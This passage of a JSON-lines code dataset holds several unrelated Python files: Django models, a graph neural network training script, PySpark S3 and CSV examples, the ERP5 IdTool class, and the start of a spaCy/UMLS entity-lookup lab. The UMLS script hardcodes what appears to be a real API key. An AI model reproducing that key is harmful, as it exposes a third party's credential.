__str__(self):\n return self.instance.name + '__' + self.area.name + '__' + str(round(self.value, 2))\n\n\nclass Response(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n milestone = models.ForeignKey(Milestone, on_delete=models.CASCADE)\n response = models.CharField(max_length=255)\n session = models.ForeignKey(\n Session, on_delete=models.SET_NULL, null=True, blank=True)\n created_at = models.DateTimeField()\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return \"%s__%s__%s%s__%s\" % (self.pk, self.instance.name, self.milestone.pk, self.milestone.name, self.response)\n\n\nclass AttributeValue(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n attribute = models.ForeignKey(Attribute, on_delete=models.CASCADE)\n value = models.TextField()\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return \"%s__%s__%s__%s\" % (self.pk, self.instance.name, self.attribute.name, self.value)\n\n\nclass PostInteraction(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n post_id = models.IntegerField()\n type = models.CharField(max_length=255, default='open')\n value = models.IntegerField(default=0)\n created_at = models.DateTimeField()\n\n def __str__(self):\n return \"%s %s %s %s\" % (self.pk, self.instance, self.post_id, self.type)\n\n\nREGISTER_TYPE_CHOICES = (\n (0, \"Script with number\"),\n (1, \"Script with text\")\n)\n\n\nclass InstanceFeedback(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n post_id = models.IntegerField()\n area = models.ForeignKey(Area, on_delete=models.CASCADE)\n value = models.IntegerField(default=1, validators=[\n MinValueValidator(0), MaxValueValidator(5)])\n reference_text = models.CharField(max_length=50)\n register_id = models.IntegerField(null=True)\n register_type = models.CharField(max_length=20, default=0)\n migration_field_id = models.IntegerField(null=True, blank=True)\n created_at = models.DateTimeField()\n\n def __str__(self):\n return \"%s %s %s %s\" % (self.pk, self.instance_id, self.area, self.value)\n\n\nclass MilestoneInteraction(models.Model):\n instance = models.ForeignKey(Instance, on_delete=models.CASCADE)\n milestone_id = models.IntegerField()\n type = models.CharField(max_length=255, default='hitos_monitoreo')\n value = models.IntegerField(default=0)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return \"%s %s %s %s\" % (self.pk, self.instance, self.milestone_id, self.type)\n","repo_name":"afinidata2019/afinidata-content-manager","sub_path":"instances/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26421268105","text":"import copy\r\nimport torch\r\nimport deepsnap\r\nimport numpy as np\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch_geometric.nn as pyg_nn\r\n\r\nfrom hetero_gnn import HeteroGNN\r\n\r\nfrom sklearn.metrics import f1_score\r\nfrom deepsnap.hetero_gnn import forward_op\r\nfrom deepsnap.hetero_graph import HeteroGraph\r\nfrom torch_sparse import SparseTensor, matmul\r\n\r\nimport pandas as pd\r\n\r\n\r\ndef train(model, optimizer, hetero_graph, train_idx):\r\n model.train()\r\n optimizer.zero_grad()\r\n preds = model(hetero_graph.node_feature, hetero_graph.edge_index)\r\n\r\n loss = None\r\n\r\n ############# Your code here #############\r\n ## Note:\r\n ## 1. Compute the loss here\r\n ## 2. `deepsnap.hetero_graph.HeteroGraph.node_label` is useful\r\n\r\n loss = model.loss(preds, hetero_graph.node_label, train_idx)\r\n\r\n loss.backward()\r\n optimizer.step()\r\n return loss.item()\r\n\r\n\r\ndef mytest(model, graph, indices, best_model=None, best_val=0, save_preds=False, agg_type=None):\r\n model.eval()\r\n accs = []\r\n for i, index in enumerate(indices):\r\n preds = model(graph.node_feature, graph.edge_index)\r\n num_node_types = 0\r\n micro = 0\r\n macro = 0\r\n for node_type in preds:\r\n idx = index[node_type]\r\n pred = preds[node_type][idx]\r\n pred = pred.max(1)[1]\r\n label_np = graph.node_label[node_type][idx].cpu().numpy()\r\n pred_np = pred.cpu().numpy()\r\n micro = f1_score(label_np, pred_np, average='micro')\r\n macro = f1_score(label_np, pred_np, average='macro')\r\n num_node_types += 1\r\n\r\n # Averaging f1 score might not make sense, but in our example we only\r\n # have one node type\r\n micro /= num_node_types\r\n macro /= num_node_types\r\n accs.append((micro, macro))\r\n\r\n # Only save the test set predictions and labels!\r\n if save_preds and i == 2:\r\n print(\"Saving Heterogeneous Node Prediction Model Predictions with Agg:\", agg_type)\r\n print()\r\n\r\n data = {}\r\n data['pred'] = pred_np\r\n data['label'] = label_np\r\n\r\n df = pd.DataFrame(data=data)\r\n # Save locally as csv\r\n df.to_csv('ACM-Node-' + agg_type + 'Agg.csv', sep=',', index=False)\r\n\r\n if accs[1][0] > best_val:\r\n best_val = accs[1][0]\r\n best_model = copy.deepcopy(model)\r\n return accs, best_model, best_val\r\n\r\n\r\ndef load_data(args):\r\n print(\"Device: {}\".format(args['device']))\r\n\r\n # Load the data\r\n data = torch.load(\"acm.pkl\")\r\n\r\n # Message types\r\n message_type_1 = (\"paper\", \"author\", \"paper\")\r\n message_type_2 = (\"paper\", \"subject\", \"paper\")\r\n\r\n print(data)\r\n\r\n # Dictionary of edge indices\r\n edge_index = dict()\r\n edge_index[message_type_1] = data['pap']\r\n edge_index[message_type_2] = data['psp']\r\n\r\n # Dictionary of node features\r\n node_feature = dict()\r\n node_feature[\"paper\"] = data['feature']\r\n\r\n # Dictionary of node labels\r\n node_label = dict()\r\n node_label[\"paper\"] = data['label']\r\n\r\n # Load the train, validation and test indices\r\n train_idx = {\"paper\": data['train_idx'].to(args['device'])}\r\n val_idx = {\"paper\": data['val_idx'].to(args['device'])}\r\n test_idx = {\"paper\": data['test_idx'].to(args['device'])}\r\n\r\n # Construct a deepsnap tensor backend HeteroGraph\r\n hetero_graph = HeteroGraph(\r\n node_feature=node_feature,\r\n node_label=node_label,\r\n edge_index=edge_index,\r\n directed=True\r\n )\r\n\r\n print(f\"ACM heterogeneous graph: {hetero_graph.num_nodes()} nodes, {hetero_graph.num_edges()} edges\")\r\n\r\n # Node feature and node label to device\r\n for key in hetero_graph.node_feature:\r\n hetero_graph.node_feature[key] = hetero_graph.node_feature[key].to(args['device'])\r\n for key in hetero_graph.node_label:\r\n hetero_graph.node_label[key] = hetero_graph.node_label[key].to(args['device'])\r\n\r\n # Edge_index to sparse tensor and to device\r\n for key in hetero_graph.edge_index:\r\n edge_index = hetero_graph.edge_index[key]\r\n adj = SparseTensor(row=edge_index[0], col=edge_index[1],\r\n sparse_sizes=(hetero_graph.num_nodes('paper'), hetero_graph.num_nodes('paper')))\r\n hetero_graph.edge_index[key] = adj.t().to(args['device'])\r\n print(hetero_graph.edge_index[message_type_1])\r\n print(hetero_graph.edge_index[message_type_2])\r\n\r\n return hetero_graph, train_idx, val_idx, test_idx\r\n\r\n\r\ndef run_model1(hetero_graph, train_idx, val_idx, test_idx, args):\r\n best_model = None\r\n best_val = 0\r\n\r\n model = HeteroGNN(hetero_graph, args, aggr=\"mean\").to(args['device'])\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args['lr'], weight_decay=args['weight_decay'])\r\n\r\n for epoch in range(args['epochs']):\r\n loss = train(model, optimizer, hetero_graph, train_idx)\r\n accs, best_model, best_val = mytest(model, hetero_graph, [train_idx, val_idx, test_idx], best_model, best_val)\r\n print(\r\n f\"Epoch {epoch + 1}: loss {round(loss, 5)}, \"\r\n f\"train micro {round(accs[0][0] * 100, 2)}%, train macro {round(accs[0][1] * 100, 2)}%, \"\r\n f\"valid micro {round(accs[1][0] * 100, 2)}%, valid macro {round(accs[1][1] * 100, 2)}%, \"\r\n f\"test micro {round(accs[2][0] * 100, 2)}%, test macro {round(accs[2][1] * 100, 2)}%\"\r\n )\r\n best_accs, _, _ = mytest(best_model, hetero_graph, [train_idx, val_idx, test_idx], save_preds=True,\r\n agg_type=\"Mean\")\r\n print(\r\n f\"Best model: \"\r\n f\"train micro {round(best_accs[0][0] * 100, 2)}%, train macro {round(best_accs[0][1] * 100, 2)}%, \"\r\n f\"valid micro {round(best_accs[1][0] * 100, 2)}%, valid macro {round(best_accs[1][1] * 100, 2)}%, \"\r\n f\"test micro {round(best_accs[2][0] * 100, 2)}%, test macro {round(best_accs[2][1] * 100, 2)}%\"\r\n )\r\n\r\n\r\ndef run_model2(hetero_graph, train_idx, val_idx, test_idx, args):\r\n best_model = None\r\n best_val = 0\r\n\r\n output_size = hetero_graph.num_node_labels('paper')\r\n model = HeteroGNN(hetero_graph, args, aggr=\"attn\").to(args['device'])\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args['lr'], weight_decay=args['weight_decay'])\r\n\r\n for epoch in range(args['epochs']):\r\n loss = train(model, optimizer, hetero_graph, train_idx)\r\n accs, best_model, best_val = mytest(model, hetero_graph, [train_idx, val_idx, test_idx], best_model, best_val)\r\n print(\r\n f\"Epoch {epoch + 1}: loss {round(loss, 5)}, \"\r\n f\"train micro {round(accs[0][0] * 100, 2)}%, train macro {round(accs[0][1] * 100, 2)}%, \"\r\n f\"valid micro {round(accs[1][0] * 100, 2)}%, valid macro {round(accs[1][1] * 100, 2)}%, \"\r\n f\"test micro {round(accs[2][0] * 100, 2)}%, test macro {round(accs[2][1] * 100, 2)}%\"\r\n )\r\n best_accs, _, _ = mytest(best_model, hetero_graph, [train_idx, val_idx, test_idx], save_preds=True,\r\n agg_type=\"Attention\")\r\n print(\r\n f\"Best model: \"\r\n f\"train micro {round(best_accs[0][0] * 100, 2)}%, train macro {round(best_accs[0][1] * 100, 2)}%, \"\r\n f\"valid micro {round(best_accs[1][0] * 100, 2)}%, valid macro {round(best_accs[1][1] * 100, 2)}%, \"\r\n f\"test micro {round(best_accs[2][0] * 100, 2)}%, test macro {round(best_accs[2][1] * 100, 2)}%\"\r\n )\r\n\r\n if model.convs1.alpha is not None and model.convs2.alpha is not None:\r\n for idx, message_type in model.convs1.mapping.items():\r\n print(f\"Layer 1 has attention {model.convs1.alpha[idx]} on message type {message_type}\")\r\n for idx, message_type in model.convs2.mapping.items():\r\n print(f\"Layer 2 has attention {model.convs2.alpha[idx]} on message type {message_type}\")\r\n\r\n\r\ndef run_main():\r\n # Please do not change the following parameters\r\n args = {\r\n 'device': torch.device('cuda' if torch.cuda.is_available() else 'cpu'),\r\n 'hidden_size': 64,\r\n 'epochs': 100,\r\n 'weight_decay': 1e-5,\r\n 'lr': 0.003,\r\n 'attn_size': 32,\r\n }\r\n\r\n hetero_graph, train_idx, val_idx, test_idx = load_data(args)\r\n\r\n # run_model1(hetero_graph, train_idx, val_idx, test_idx, args)\r\n run_model2(hetero_graph, train_idx, val_idx, test_idx, args)\r\n\r\n\r\nif __name__ == '__main__':\r\n run_main()\r\n","repo_name":"ssd227/GNN","sub_path":"cs224w/colab5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36896103891","text":"from django.db import models\n\n# Create your models here.\nfrom django.utils.translation import gettext_lazy as _\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom core.models import DefaultObject\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.core.exceptions import ValidationError, FieldError\nimport room_equipment.models\nfrom django.utils.html import mark_safe\n\nclass Manufacturer(DefaultObject, models.Model):\n\n \"\"\"\n Item Manufacturer\n \"\"\"\n\n logo = models.ImageField(\n _(\"logo\"), \n upload_to='uploads/logo/manufacturer', \n height_field=None, \n width_field=None, \n max_length=None,\n blank=True\n )\n\n\n class Meta:\n verbose_name = _(\"Manufacturer\")\n verbose_name_plural = _(\"Manufacturers\")\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse(\"Manufacturer_detail\", kwargs={\"pk\": self.pk})\n\n def logo_tag(self):\n if self.logo:\n return mark_safe(''%(self.logo.url))\n return None\n logo_tag.short_description = 'Manufacturer logo'\n logo_tag.allow_tags = True\n\nclass Item(DefaultObject, models.Model):\n \"\"\"\n Item\n \"\"\"\n manufacturer_fk = models.ForeignKey(\n Manufacturer, verbose_name=_(\"manufacturer\"), on_delete=models.CASCADE,\n null=True)\n model = models.CharField(_(\"model\"), max_length=50, blank=True)\n is_consumable = models.BooleanField(_(\"is_consumable\"),default=False)\n icon = models.ImageField(\n _(\"icon\"), \n upload_to='uploads/icons/item', \n height_field=None, \n width_field=None, \n max_length=None,\n blank=True\n )\n\n class Meta:\n verbose_name = _(\"Item\")\n verbose_name_plural = _(\"Items\")\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n return reverse(\"Item_detail\", kwargs={\"pk\": self.pk})\n def icon_tag(self):\n if self.icon:\n return mark_safe(''%(self.icon.url))\n return None\n icon_tag.short_description = 'Item icon'\n icon_tag.allow_tags = True\n\nclass ItemLocation(models.Model):\n \"\"\"\n Lokalizacja itemu\n \"\"\"\n description = models.TextField(_(\"description\"),blank=True)\n container_item_fk = models.ForeignKey(\n room_equipment.models.ContainerItem, \n verbose_name=_(\"container_item\"), \n on_delete=models.CASCADE, null=True\n )\n item_fk = models.ForeignKey(Item, verbose_name=_(\"item\"), on_delete=models.CASCADE)\n serial = models.CharField(_(\"serial\"), max_length=50,blank=True)\n pieces = models.IntegerField(_(\"pieces\"))\n mac = models.CharField(_(\"mac\"), max_length=50,blank=True)\n ip = models.CharField(_(\"ip\"), max_length=50,blank=True)\n\n\n class Meta:\n verbose_name = _(\"ItemLocation\")\n verbose_name_plural = _(\"ItemLocations\")\n\n def get_info(self):\n return f\"{self.item_fk.name} x{self.pieces}\"\n\n def __str__(self):\n return self.get_info()\n\n def get_absolute_url(self):\n return reverse(\"ItemLocation_detail\", kwargs={\"pk\": self.pk})","repo_name":"coconutcake/isk","sub_path":"app/stock/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4174865883","text":"from pyspark.sql import SparkSession\nfrom pyspark import SparkContext, SparkConf\n\n# Create a SparkContext with the Hadoop-AWS dependency\nconf = SparkConf().set('spark.jars.packages', 'org.apache.hadoop:hadoop-aws:3.3.1')\nsc = SparkContext(conf=conf)\n\n# Configure S3 bucket credentials\nACCESS_KEY_ID = \"YOUR ACCESS KEY\"\nSECRET_ACCESS_KEY = \"YOUR SECRET KEY\"\nENDPOINT = \"S3 API Endpoint\"\n\nsc._jsc.hadoopConfiguration().set('fs.s3a.access.key', ACCESS_KEY_ID)\nsc._jsc.hadoopConfiguration().set('fs.s3a.secret.key', SECRET_ACCESS_KEY)\nsc._jsc.hadoopConfiguration().set('fs.s3a.endpoint', ENDPOINT)\n\n# Create a SparkSession\nspark = SparkSession(sc)\n\n# Read data from S3\ndf = spark.read.option('header', 'true').csv(\"s3a://XXXXXX/data.csv\")\n\n# Process and analyze the data\ndf.show()\n","repo_name":"00mjk/Lyve-Cloud-Solutions-Samples","sub_path":"apache-spark/pyspark_example.py","file_name":"pyspark_example.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"71249271603","text":"import six\nimport warnings\nimport zope.interface\n\nfrom Acquisition import aq_base\nfrom AccessControl import ClassSecurityInfo\nfrom Products.ERP5Type.Globals import InitializeClass, DTMLFile, PersistentMapping\nfrom Products.ERP5Type.Tool.BaseTool import BaseTool\nfrom Products.ERP5Type.Cache import caching_instance_method\nfrom Products.ERP5Type import Permissions, interfaces\nfrom zLOG import LOG, WARNING, INFO, ERROR\nfrom Products.ERP5 import _dtmldir\n\nfrom BTrees.Length import Length\n\n_marker = object()\n\n@zope.interface.implementer(interfaces.IIdTool)\nclass IdTool(BaseTool):\n \"\"\"\n This tools handles the generation of IDs.\n \"\"\"\n id = 'portal_ids'\n meta_type = 'ERP5 Id Tool'\n portal_type = 'Id Tool'\n title = 'Id Generators'\n\n # Declarative Security\n security = ClassSecurityInfo()\n\n security.declareProtected( Permissions.ManagePortal, 'manage_overview' )\n manage_overview = DTMLFile( 'explainIdTool', _dtmldir )\n\n def newContent(self, *args, **kw):\n \"\"\"\n the newContent is overriden to not use generateNewId\n \"\"\"\n if id not in kw:\n new_id = self._generateNextId()\n if new_id is not None:\n kw['id'] = new_id\n else:\n raise ValueError('Failed to gererate id')\n return BaseTool.newContent(self, *args, **kw)\n\n def _get_id(self, id):\n \"\"\"\n _get_id is overrided to not use generateNewId\n It is used for example when an object is cloned\n \"\"\"\n if self._getOb(id, None) is None :\n return id\n return self._generateNextId()\n\n @caching_instance_method(id='IdTool._getLatestIdGenerator',\n cache_factory='erp5_content_long')\n def _getLatestIdGenerator(self, reference):\n \"\"\"\n Tries to find the id_generator with the latest version\n from the current object.\n Use the low-level to create a site without catalog\n \"\"\"\n assert reference\n id_last_generator = None\n version_last_generator = 0\n for generator in self.objectValues():\n if generator.getReference() == reference:\n # Version Property Sheet defines 'version' property as a 'string'\n version = int(generator.getVersion())\n if version > version_last_generator:\n id_last_generator = generator.getId()\n version_last_generator = version\n if id_last_generator is None:\n raise KeyError(repr(reference))\n return id_last_generator\n\n def _getLatestGeneratorValue(self, id_generator):\n \"\"\"\n Return the last generator with the reference\n \"\"\"\n return self._getOb(self._getLatestIdGenerator(id_generator))\n\n security.declareProtected(Permissions.AccessContentsInformation,\n 'generateNewId')\n def generateNewId(self, id_group=None, default=None, method=_marker,\n id_generator=None, poison=False):\n \"\"\"\n Generate the next id in the sequence of ids of a particular group\n \"\"\"\n if id_group in (None, 'None'):\n raise ValueError('%r is not a valid id_group' % id_group)\n # for compatibilty with sql data, must not use id_group as a list\n if not isinstance(id_group, str):\n id_group = repr(id_group)\n warnings.warn('id_group must be a string, other types '\n 'are deprecated.', DeprecationWarning)\n if id_generator is None:\n id_generator = 'document'\n if method is not _marker:\n warnings.warn(\"Use of 'method' argument is deprecated\", DeprecationWarning)\n try:\n #use _getLatestGeneratorValue here for that the technical level\n #must not call the method\n last_generator = self._getLatestGeneratorValue(id_generator)\n new_id = last_generator.generateNewId(\n id_group=id_group,\n default=default,\n poison=poison,\n )\n except KeyError:\n # XXX backward compatiblity\n if self.getTypeInfo():\n LOG('generateNewId', ERROR, 'while generating id')\n raise\n else:\n # Compatibility code below, in case the last version of erp5_core\n # is not installed yet\n warnings.warn(\"You are using an old version of erp5_core to generate\"\n \"ids.\\nPlease update erp5_core business template to \"\n \"use new id generators\", DeprecationWarning)\n dict_ids = getattr(aq_base(self), 'dict_ids', None)\n if dict_ids is None:\n dict_ids = self.dict_ids = PersistentMapping()\n new_id = None\n # Getting the last id\n if default is None:\n default = 0\n marker = []\n new_id = dict_ids.get(id_group, marker)\n if method is _marker:\n if new_id is marker:\n new_id = default\n else:\n new_id = new_id + 1\n else:\n if new_id is marker:\n new_id = default\n new_id = method(new_id)\n # Store the new value\n dict_ids[id_group] = new_id\n return new_id\n\n security.declareProtected(Permissions.AccessContentsInformation,\n 'generateNewIdList')\n def generateNewIdList(self, id_group=None, id_count=1, default=None,\n store=_marker, id_generator=None, poison=False):\n \"\"\"\n Generate a list of next ids in the sequence of ids of a particular group\n \"\"\"\n if id_group in (None, 'None'):\n raise ValueError('%r is not a valid id_group' % id_group)\n # for compatibilty with sql data, must not use id_group as a list\n if not isinstance(id_group, str):\n id_group = repr(id_group)\n warnings.warn('id_group must be a string, other types '\n 'are deprecated.', DeprecationWarning)\n if id_generator is None:\n id_generator = 'uid'\n if store is not _marker:\n warnings.warn(\"Use of 'store' argument is deprecated.\",\n DeprecationWarning)\n try:\n #use _getLatestGeneratorValue here for that the technical level\n #must not call the method\n last_generator = self._getLatestGeneratorValue(id_generator)\n new_id_list = last_generator.generateNewIdList(id_group=id_group,\n id_count=id_count, default=default, poison=poison)\n except (KeyError, ValueError):\n # XXX backward compatiblity\n if self.getTypeInfo():\n LOG('generateNewIdList', ERROR, 'while generating id')\n raise\n else:\n # Compatibility code below, in case the last version of erp5_core\n # is not installed yet\n warnings.warn(\"You are using an old version of erp5_core to generate\"\n \"ids.\\nPlease update erp5_core business template to \"\n \"use new id generators\", DeprecationWarning)\n new_id = None\n if default is None:\n default = 1\n # XXX It's temporary, a New API will be implemented soon\n # the code will be change\n portal = self.getPortalObject()\n try:\n query = portal.IdTool_zGenerateId\n commit = portal.IdTool_zCommit\n except AttributeError:\n portal_catalog = portal.portal_catalog.getSQLCatalog()\n query = portal_catalog.z_portal_ids_generate_id\n commit = portal_catalog.z_portal_ids_commit\n try:\n result = query(id_group=id_group, id_count=id_count, default=default)\n finally:\n commit()\n new_id = result[0]['LAST_INSERT_ID()']\n if store:\n if getattr(aq_base(self), 'dict_length_ids', None) is None:\n # Length objects are stored in a persistent mapping: there is one\n # Length object per id_group.\n self.dict_length_ids = PersistentMapping()\n if self.dict_length_ids.get(id_group) is None:\n self.dict_length_ids[id_group] = Length(new_id)\n self.dict_length_ids[id_group].set(new_id)\n if six.PY2:\n new_id_list = range(new_id - id_count, new_id)\n else:\n new_id_list = list(range(new_id - id_count, new_id))\n return new_id_list\n\n security.declareProtected(Permissions.ModifyPortalContent,\n 'initializeGenerator')\n def initializeGenerator(self, id_generator=None, all=False):\n \"\"\"\n Initialize generators. This is mostly used when a new ERP5 site\n is created. Some generators will need to do some initialization like\n creating SQL Database, prepare some data in ZODB, etc\n \"\"\"\n if not all:\n #Use _getLatestGeneratorValue here for that the technical level\n #must not call the method\n last_generator = self._getLatestGeneratorValue(id_generator)\n last_generator.initializeGenerator()\n else:\n # recovery all the generators and initialize them\n for generator in self.objectValues(\\\n portal_type='Application Id Generator'):\n generator.initializeGenerator()\n\n security.declareProtected(Permissions.ModifyPortalContent,\n 'clearGenerator')\n def clearGenerator(self, id_generator=None, all=False):\n \"\"\"\n Clear generators data. This can be usefull when working on a\n development instance or in some other rare cases. This will\n loose data and must be use with caution\n\n This can be incompatible with some particular generator implementation,\n in this case a particular error will be raised (to be determined and\n added here)\n \"\"\"\n if not all:\n #Use _getLatestGeneratorValue here for that the technical level\n #must not call the method\n last_generator = self._getLatestGeneratorValue(id_generator)\n last_generator.clearGenerator()\n\n else:\n if len(self.objectValues()) == 0:\n # compatibility with old API\n self.getPortalObject().IdTool_zDropTable()\n self.getPortalObject().IdTool_zCreateTable()\n for generator in self.objectValues(\\\n portal_type='Application Id Generator'):\n generator.clearGenerator()\n\n ## XXX Old API deprecated\n #backward compatibility\n security.declareProtected(Permissions.AccessContentsInformation,\n 'generateNewLengthIdList')\n generateNewLengthIdList = generateNewIdList\n\n security.declareProtected(Permissions.AccessContentsInformation,\n 'getLastLengthGeneratedId')\n def getLastLengthGeneratedId(self, id_group, default=None):\n \"\"\"\n Get the last length id generated\n \"\"\"\n warnings.warn('getLastLengthGeneratedId is deprecated',\n DeprecationWarning)\n # check in persistent mapping if exists\n if getattr(aq_base(self), 'dict_length_ids', None) is not None:\n last_id = self.dict_length_ids.get(id_group)\n if last_id is not None:\n return last_id.value - 1\n # otherwise check in mysql\n # XXX It's temporary, a New API will be implemented soon\n # the code will be change\n portal = self.getPortalObject()\n try:\n query = portal.IdTool_zGetLastId\n except AttributeError:\n query = portal.portal_catalog.getSQLCatalog().z_portal_ids_get_last_id\n result = query(id_group=id_group)\n if len(result):\n try:\n return result[0]['last_id']\n except KeyError:\n return result[0]['LAST_INSERT_ID()']\n return default\n\n security.declareProtected(Permissions.AccessContentsInformation,\n 'getLastGeneratedId')\n def getLastGeneratedId(self, id_group=None, default=None):\n \"\"\"\n Get the last id generated\n \"\"\"\n warnings.warn('getLastGeneratedId is deprecated', DeprecationWarning)\n if getattr(aq_base(self), 'dict_ids', None) is None:\n self.dict_ids = PersistentMapping()\n last_id = None\n if id_group is not None and id_group != 'None':\n last_id = self.dict_ids.get(id_group, default)\n return last_id\n\n security.declareProtected(Permissions.ModifyPortalContent,\n 'setLastGeneratedId')\n def setLastGeneratedId(self, new_id, id_group=None):\n \"\"\"\n Set a new last id. This is usefull in order to reset\n a sequence of ids.\n \"\"\"\n if getattr(aq_base(self), 'dict_ids', None) is None:\n self.dict_ids = PersistentMapping()\n if id_group is not None and id_group != 'None':\n self.dict_ids[id_group] = new_id\n\n security.declareProtected(Permissions.AccessContentsInformation,\n 'generateNewLengthId')\n def generateNewLengthId(self, id_group=None, default=None, store=_marker):\n \"\"\"Generates an Id using a conflict free id generator. Deprecated.\n \"\"\"\n warnings.warn('generateNewLengthId is deprecated.\\n'\n 'Use generateNewIdList with a sql id_generator',\n DeprecationWarning)\n if store is not _marker:\n return self.generateNewIdList(id_group=id_group,\n id_count=1, default=default, store=store)[0]\n return self.generateNewIdList(id_group=id_group,\n id_count=1, default=default)[0]\n\n security.declareProtected(Permissions.AccessContentsInformation,\n 'getDictLengthIdsItems')\n def getDictLengthIdsItems(self):\n \"\"\"\n Return a copy of dict_length_ids.\n This is a workaround to access the persistent mapping content from ZSQL\n method to be able to insert initial tuples in the database at creation.\n \"\"\"\n if getattr(self, 'dict_length_ids', None) is None:\n self.dict_length_ids = PersistentMapping()\n return self.dict_length_ids.items()\n\n security.declarePrivate('dumpDictLengthIdsItems')\n def dumpDictLengthIdsItems(self):\n \"\"\"\n Store persistently data from SQL table portal_ids.\n \"\"\"\n portal_catalog = getattr(self, 'portal_catalog').getSQLCatalog()\n query = getattr(portal_catalog, 'z_portal_ids_dump')\n dict_length_ids = getattr(aq_base(self), 'dict_length_ids', None)\n if dict_length_ids is None:\n dict_length_ids = self.dict_length_ids = PersistentMapping()\n for line in query().dictionaries():\n id_group = line['id_group']\n last_id = line['last_id']\n stored_last_id = self.dict_length_ids.get(id_group)\n if stored_last_id is None:\n self.dict_length_ids[id_group] = Length(last_id)\n else:\n stored_last_id_value = stored_last_id()\n if stored_last_id_value < last_id:\n stored_last_id.set(last_id)\n else:\n if stored_last_id_value > last_id:\n LOG('IdTool', WARNING, 'ZODB value (%r) for group %r is higher ' \\\n 'than SQL value (%r). Keeping ZODB value untouched.' % \\\n (stored_last_id, id_group, last_id))\n\nInitializeClass(IdTool)\n","repo_name":"Nexedi/erp5","sub_path":"product/ERP5/Tool/IdTool.py","file_name":"IdTool.py","file_ext":"py","file_size_in_byte":14445,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"26961107981","text":"#import des packages \nimport json\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.types import *\nfrom datetime import datetime\nsqlContext=SQLContext(sc)\n\ndef convertJsonList(string):\n data=json.loads(string)\n return [data[key] for key in data.keys()]\n\ndef convertDate(string):\n return datetime.strptime(string.strip(),\"%d/%m/%Y\").date()\n\n\nschema=StructType([\n (StructField(\"name\",StringType(),True)),\n\t (StructField(\"age\",IntegerType(),True)),\n\t (StructField(\"date\",DateType(),True)),\n (StructField(\"three\",StringType(),True)),\n (StructField(\"two\",StringType(),True)),\n (StructField(\"one\",StringType(),True))\n ])\n\nfile=sc.textFile(\"examples/src/main/resources/people.txt\")\n\nparts=file.map(lambda line:line.split(\";\"))\n\ndata=parts.map(lambda line:[line[0],line[1].strip(),line[2],convertJsonList(line[3])])\n\naxa=data.map(lambda line:(line[0],int(line[1]),convertDate(line[2]),line[3][0],line[3][1],line[3][2]))\n\ndf=sqlContext.createDataFrame(axa,schema)\n\ndf.show()\n\n\n","repo_name":"ocamara/HandleSparkWithScala","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1776859849","text":"# lab3 python file\r\n# importing necessary packages for lab3\r\nimport spacy\r\nimport json\r\nfrom Authentication import *\r\nfrom pathlib import Path\r\nimport wikipedia\r\nimport webbrowser\r\n\r\n\r\n# use Spacy and SciSpacy to identify entities in the \"entire\" text (not just HPI)\r\n# use SciSpacy model \"en_ner_bc5cdr_md\"\r\ndef entities(wname, rname):\r\n\r\n with open(rname) as r:\r\n with open(wname, \"w\") as w:\r\n path = Path().absolute()\r\n print(\" Analyzing with SciSpacy Model...\")\r\n content = r.read()\r\n nlp = spacy.load(\"en_ner_bc5cdr_md\")\r\n doc = nlp(content)\r\n entityList = []\r\n w.write(\"Spacy Entity List\\n\")\r\n for word in doc.ents:\r\n entityList.append((str(word)))\r\n entityList = list(dict.fromkeys(entityList))\r\n result = []\r\n marker = set()\r\n for l in entityList:\r\n ll = l.lower()\r\n if ll not in marker:\r\n marker.add(ll)\r\n result.append(l)\r\n for entity in result:\r\n w.write(entity + \"\\n\")\r\n print(\"Saved Spacy Entities to file \" + str(path.as_posix()) + \"/\" + wname)\r\n return result\r\n\r\n\r\n# use UMLS UTS for each entity and for those that are UMLS concepts, identify which are\r\n# diseases/syndromes by using the UMLS concept's semantic type. To do this, you will use the /search end\r\n# point to retrieve CUIs for those entities that are UMLS concepts. For each of these, then use the\r\n# /content/current/CUI?{CUI}\r\n# 2. For each Spacy identified \"entity\", fetch the following from the UMLS:\r\n# CUI | Term | Source Terminology.\r\ndef get_ulms_info(string):\r\n apikey = \"69d2ad47-8307-4f4c-b0aa-dfa5fbeae47e\"\r\n version = \"current\"\r\n uri = \"https://uts-ws.nlm.nih.gov\"\r\n content_endpoint = \"/rest/search/\" + version\r\n # get at ticket granting ticket for the session\r\n AuthClient = Authentication(apikey)\r\n tgt = AuthClient.gettgt()\r\n pageNumber = 0\r\n # generate a new service ticket for each page if needed\r\n ticket = AuthClient.getst(tgt)\r\n pageNumber += 1\r\n # construct the RESTful API command variable\r\n query = {'string': string, 'ticket': ticket, 'pageNumber': pageNumber}\r\n query['searchType'] = \"exact\"\r\n query['sabs'] = 